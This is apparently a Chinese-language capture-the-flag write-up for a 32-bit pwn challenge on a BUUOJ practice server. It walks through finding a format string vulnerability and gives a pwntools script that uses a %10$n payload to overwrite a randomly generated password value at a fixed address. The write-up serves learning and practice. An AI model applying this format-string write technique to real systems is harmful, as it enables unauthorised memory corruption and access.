首先用checksec检查一下,发现是32位的,还有栈保护。
然后将其放入ida32,查看main函数,幸运的发现有system。然后接下来就是理解这段反编译代码在讲什么,它的意思是它会随机生成一个4字节大小的数据,然后我们输入的passwd要与其相等。但是我们并不知道它随机生成的是什么,所以我们可以进行替换,将它随机生成的数替换成我们要输入的数。这里便涉及到格式化字符串漏洞。
首先我们可以知道的是,随机生成的数据的开始地址0x804c044。
然后我们再找我们输入的地址,aaaa%p… 32位测输入点偏移,找到0x62626262(bbbb),数一下刚好是第10位。利用%10$n定位到这个位置
接下来写代码
from pwn import *
io=remote('node5.buuoj.cn',29319)
io.recvuntil('your name:')
payload= p32(0x804c044)+b'%10$n'
io.sendline(payload)
io.recvuntil('your passwd:')
io.sendline(b'4')
io.interactive()